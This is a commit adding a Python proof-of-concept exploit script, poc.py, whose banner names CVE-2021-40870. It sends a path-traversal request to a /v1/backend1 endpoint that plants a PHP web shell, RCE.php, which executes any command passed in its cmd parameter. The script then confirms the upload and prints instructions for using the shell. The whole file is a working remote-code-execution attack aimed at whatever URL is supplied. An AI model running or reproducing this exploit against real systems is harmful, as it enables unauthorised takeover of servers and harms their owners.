Create poc.py

poc.py

@@ -0,0 +1,57 @@
+import requests
+import json
+import sys
+import time
+from requests.packages import urllib3
+
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+banner = '''
+
+   ___         __    ____   ___ ____  _       _  _    ___   ___ _____ ___  
+  / __\/\   /\/__\  |___ \ / _ \___ \/ |     | || |  / _ \ ( _ )___  / _ \ 
+ / /   \ \ / /_\_____ __) | | | |__) | |_____| || |_| | | |/ _ \  / / | | |
+/ /___  \ V //_|_____/ __/| |_| / __/| |_____|__   _| |_| | (_) |/ /| |_| |
+\____/   \_/\__/    |_____|\___/_____|_|        |_|  \___/ \___//_/  \___/
+
+                                                        [by 0xAgun]
+
+                     Use : python3 poc.py https://site.com/
+                                                                           
+
+'''
+print(banner)
+
+base_url = sys.argv[1]
+user = '''Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'''
+filename = "RCE.php"
+shell = '''<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>'''
+if base_url.startswith('https://'):
+    k = base_url.replace("https://", "")
+    if k.endswith("/"):
+        p = k.replace("/", "")
+
+headers = {
+    "Host": p,
+    "User-Agent": user,
+    "Connection": "close",
+    "Content-Length": "109",
+    "Content-Type": "application/x-www-form-urlencoded",
+    "Accept-Encoding": "gzip",
+
+}
+
+body = f'CID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/{filename}&data=poc by agun{shell}'
+
+
+r = requests.post(base_url+'/v1/backend1', headers=headers, data=body, verify=False)
+
+check_file = requests.get(base_url+'/v1/'+filename, verify=False)
+if check_file.status_code == 200:
+    print(f'EXPLOITED {base_url}')
+    print('')
+    print(f'Go To {base_url}/v1/{filename}')
+    print('')
+    print('access shell using RCE.php?cmd=[command]')
+else:
+    print("Sorry Dude Bad luck")